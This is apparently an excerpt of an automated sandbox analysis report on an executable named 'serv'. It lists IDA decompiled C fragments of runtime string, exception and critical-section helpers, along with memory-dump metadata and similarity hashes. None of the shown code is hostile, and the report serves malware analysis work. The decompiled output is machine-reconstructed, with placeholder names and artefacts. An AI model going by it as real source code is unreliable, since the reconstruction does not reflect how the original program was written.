                                                                    0x00423368
                                                                    0x0042336a
                                                                    0x0042336a

                                                                    APIs
                                                                    • RtlInitializeCriticalSection.NTDLL(89B), ref: 00427A2B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalInitializeSection
                                                                    • String ID: 89B$csm
                                                                    • API String ID: 32694325-3340445378
                                                                    • Opcode ID: e5205d9dd9a17310e1f9df394a7c3c8b84d177bbd62c41bc458a8a61391274ad
                                                                    • Instruction ID: 8a1b5bfc1e1b0993bd398e324714e1130b351fb337a81dee8734de33435007f6
                                                                    • Opcode Fuzzy Hash: e5205d9dd9a17310e1f9df394a7c3c8b84d177bbd62c41bc458a8a61391274ad
                                                                    • Instruction Fuzzy Hash: 09F06D31759224DED305BF61B80AB293670BF1172BF92419BB150990E28F7C5E45AA1A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E004224F6(intOrPtr* __ecx, intOrPtr _a4) {
                                                                    				intOrPtr _t9;
                                                                    				intOrPtr _t14;
                                                                    				intOrPtr _t21;
                                                                    				intOrPtr* _t22;
                                                                    
                                                                    				_t22 = __ecx;
                                                                    				_t21 = _a4;
                                                                    				 *__ecx = 0x430324;
                                                                    				_t2 = _t21 + 8; // 0xf0758950
                                                                    				_t9 =  *_t2;
                                                                    				 *((intOrPtr*)(__ecx + 8)) = _t9;
                                                                    				if(_t9 == 0) {
                                                                    					_t7 = _t21 + 4; // 0xf0458d00
                                                                    					 *((intOrPtr*)(__ecx + 4)) =  *_t7;
                                                                    				} else {
                                                                    					_t4 = _t21 + 4; // 0xf0458d00
                                                                    					_t14 = E00422EEB(E00422F20( *_t4) + 1);
                                                                    					 *((intOrPtr*)(_t22 + 4)) = _t14;
                                                                    					if(_t14 != 0) {
                                                                    						_t6 = _t21 + 4; // 0xf0458d00
                                                                    						E00423FB0(_t14,  *_t6);
                                                                    					}
                                                                    				}
                                                                    				return _t22;
                                                                    			}







                                                                    0x004224f7
                                                                    0x004224fa
                                                                    0x004224fe
                                                                    0x00422504
                                                                    0x00422504
                                                                    0x00422509
                                                                    0x0042250c
                                                                    0x00422533
                                                                    0x00422536
                                                                    0x0042250e
                                                                    0x0042250e
                                                                    0x00422518
                                                                    0x00422521
                                                                    0x00422524
                                                                    0x00422526
                                                                    0x0042252a
                                                                    0x00422530
                                                                    0x00422524
                                                                    0x0042253d

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: _strcat_strlen
                                                                    • String ID: c%B
                                                                    • API String ID: 432593777-3320929328
                                                                    • Opcode ID: 3e1e4b31f72973b05bd2d8f8181ae620774a18e6356d6742be44a9970f8b39a5
                                                                    • Instruction ID: 80f988887b7f855445f9966f9fd6066b43f7a1dfbecb2169e33240a71772aeff
                                                                    • Opcode Fuzzy Hash: 3e1e4b31f72973b05bd2d8f8181ae620774a18e6356d6742be44a9970f8b39a5
                                                                    • Instruction Fuzzy Hash: 45F012B2608621BE97209F55FA01417F7E8FF54710391D51FF854C3650DBB4E851D798
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 86%
                                                                    			E00421B79() {
                                                                    				void* _t16;
                                                                    				void* _t18;
                                                                    				intOrPtr* _t20;
                                                                    				void* _t22;
                                                                    				void* _t23;
                                                                    				void* _t24;
                                                                    				void* _t27;
                                                                    
                                                                    				E004232F0(E0042FE7A, _t24);
                                                                    				_t1 = _t24 - 0x28; // 0xb4
                                                                    				E00402A60(_t1, "string too long");
                                                                    				 *(_t24 - 4) =  *(_t24 - 4) & 0x00000000;
                                                                    				_t4 = _t24 - 0x28; // 0xb4
                                                                    				_t5 = _t24 - 0x50; // 0x8c
                                                                    				_t20 = _t5;
                                                                    				E004029A0(_t20, _t27, _t4);
                                                                    				_t6 = _t24 - 0x50; // 0xb4
                                                                    				 *((intOrPtr*)(_t24 - 0x50)) = 0x4302a8;
                                                                    				_t16 = E0042246E(_t6, 0x432674);
                                                                    				asm("int3");
                                                                    				 *_t20 = 0x4302e8;
                                                                    				_t28 =  *((intOrPtr*)(_t20 + 8));
                                                                    				 *_t20 = 0x430324;
                                                                    				if( *((intOrPtr*)(_t20 + 8)) != 0) {
                                                                    					_push( *((intOrPtr*)(_t20 + 4)));
                                                                    					return E0042275E(_t18, _t22, _t23, _t28);
                                                                    				}
                                                                    				return _t16;
                                                                    			}










                                                                    0x00421b7e
                                                                    0x00421b8b
                                                                    0x00421b8e
                                                                    0x00421b93
                                                                    0x00421b97
                                                                    0x00421b9b
                                                                    0x00421b9b
                                                                    0x00421b9e
                                                                    0x00421ba8
                                                                    0x00421bac
                                                                    0x00421bb3
                                                                    0x00421bb8
                                                                    0x00421bb9
                                                                    0x00422540
                                                                    0x00422544
                                                                    0x0042254a
                                                                    0x0042254c
                                                                    0x00000000
                                                                    0x00422554
                                                                    0x00422555

                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00421B7E
                                                                      • Part of subcall function 0042246E: RaiseException.KERNEL32(?,?,000000FF,00432DF4,00000000,004302E8,?,?,?,00421C58,000000FF,00432DF4,004480D0,?,000000FF,004136B9), ref: 0042249C
                                                                      • Part of subcall function 0042275E: __lock.LIBCMT ref: 0042277C
                                                                      • Part of subcall function 0042275E: RtlFreeHeap.NTDLL(00000000,?,00430358,0000000C,00424114,00000000,?,00423E81,?,004303A8,00000060), ref: 004227C3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFreeH_prologHeapRaise__lock
                                                                    • String ID: c%B$string too long
                                                                    • API String ID: 2277933175-2929179188
                                                                    • Opcode ID: 1a49d5bf7a470a735a4a13961e36ac1c21a4b8c3a022a2a58c8c47be15211e6b
                                                                    • Instruction ID: bc1570ca240a635d414bef9b8a9f541bcd4c89b2cdb9d9533b463b18037a3bfc
                                                                    • Opcode Fuzzy Hash: 1a49d5bf7a470a735a4a13961e36ac1c21a4b8c3a022a2a58c8c47be15211e6b
                                                                    • Instruction Fuzzy Hash: D6F0E9B0600114ABC704EB90D95A79DB7746F04308FA0816FE00175491CBFD4645CB5D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E004224B9(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4) {
                                                                    				intOrPtr _t6;
                                                                    				intOrPtr* _t15;
                                                                    
                                                                    				_t14 = _a4;
                                                                    				_t15 = __ecx;
                                                                    				 *__ecx = 0x430324;
                                                                    				_t6 = E00422EEB(E00422F20( *_a4) + 1);
                                                                    				 *((intOrPtr*)(_t15 + 4)) = _t6;
                                                                    				if(_t6 != 0) {
                                                                    					E00423FB0(_t6,  *_t14);
                                                                    				}
                                                                    				 *((intOrPtr*)(_t15 + 8)) = 1;
                                                                    				return _t15;
                                                                    			}





                                                                    0x004224bb
                                                                    0x004224bf
                                                                    0x004224c1
                                                                    0x004224d0
                                                                    0x004224d9
                                                                    0x004224dc
                                                                    0x004224e1
                                                                    0x004224e7
                                                                    0x004224e9
                                                                    0x004224f3

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: _strcat_strlen
                                                                    • String ID: c%B
                                                                    • API String ID: 432593777-3320929328
                                                                    • Opcode ID: c72ed0344ed5e7b7e1c5f6f428284e45aef2e38471709534a521797c8c589731
                                                                    • Instruction ID: 33969a01577cb264199cc35a4cbc1147865b94b171568ec021ab07969405ed47
                                                                    • Opcode Fuzzy Hash: c72ed0344ed5e7b7e1c5f6f428284e45aef2e38471709534a521797c8c589731
                                                                    • Instruction Fuzzy Hash: 0EE04F7260C3216EE6246F56FA01546F7E8EF58324B61841FF844C3664EBBAA850865C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%